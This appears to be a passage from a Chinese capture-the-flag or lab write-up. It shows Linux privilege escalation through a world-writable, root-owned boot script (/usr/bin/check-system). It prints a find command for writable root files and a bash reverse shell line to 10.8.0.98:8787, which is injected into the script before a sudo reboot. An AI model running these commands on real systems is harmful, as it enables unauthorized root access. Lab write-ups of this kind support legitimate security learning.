【此次省略一万字.........】
成功突破边界!
提权:
看了sudo -l,发现一个shutdown命令可以,但是这名字应该是重启吧。。。先跑一跑linpeas.sh,试了一下跑出来的CVE,没有成功
找一找具有root命令并且我们可以写权限的文件:
find / -user root -type f -perm -o=rw -ls 2>/dev/null | grep -v "/proc"
这个命令的目的是查找所有属于 root 用户的、具有写权限的、并且可以被任何用户执行的文件,但排除 /proc 目录中的内容
发现了check-system文件,看了一下内容:
查看资料:
系统启动时启动的程序由systemd , 系统和服务管理器控制。systemd是启动时运行的第一个进程。它始终具有进程ID (PID)1。计算机中正在运行的所有其他进程都是由systemd启动的,或者由systemd已经启动的进程启动。
那就有可能,我们需要以sudo命令运行刚刚上面的shutdown命令,在这个check-system文件里面写入反弹shell脚本,这样系统重启的时候,我们就拿到root提权:
vim.tiny /usr/bin/check-system
(这里有坑,我用find / -perm -u=s -type f 2>/dev/null这个命令找不到vim.tiny,但是它又是存在的,如果直接用vi编辑check-system文件,那就各种BUG,编辑不了,用vim.tiny就可以)
bash -i >& /dev/tcp/10.8.0.98/8787 0>&1;
sudo shutdown -r
等待命令弹回来
